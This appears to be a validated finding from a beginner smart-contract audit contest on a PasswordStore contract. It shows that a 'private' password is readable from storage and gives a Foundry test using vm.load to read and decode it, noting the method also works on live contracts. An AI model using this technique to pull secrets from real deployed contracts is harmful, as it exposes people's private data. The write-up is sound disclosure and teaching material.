First Flight #1: PasswordStore
First Flight #1
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Private information should not be stored on the blockchain

0xJimbo

Summary

Password will be visible to all.

Vulnerability Details

Although declared as a private variable, the value can be determined by reading the contracts storage slots.

This can be done in foundry adding the following functions to the test file:

function testCanGetPassword() public {
bytes32 storedData = vm.load(address(passwordStore), bytes32(uint256(1)));
// Convert bytes32 to string
string memory storedPassword = bytes32ToString(storedData);
console.log(storedPassword);
vm.prank(owner);
string memory actualPassword = passwordStore.getPassword();
console.log(actualPassword);
assertEq(storedPassword, actualPassword);
}
function bytes32ToString(bytes32 _bytes32) internal pure returns (string memory) {
uint256 charCount = 0;
for (uint256 i = 0; i < 32; i++) {
if (_bytes32[i] != 0) {
charCount++;
} else {
break;
}
}
bytes memory resultBytes = new bytes(charCount);
for (uint256 i = 0; i < charCount; i++) {
resultBytes[i] = _bytes32[i];
}
return string(resultBytes);
}

The same method could be applied to a live contract using a forked chain.

Impact

Private information being available to public.

Tools Used

Foundry

Recommendations

Do not store unencrypted private information on a public blockchain

Updates

Lead Judging Commences

inallhonesty Lead Judge
about 2 years ago
inallhonesty Lead Judge about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.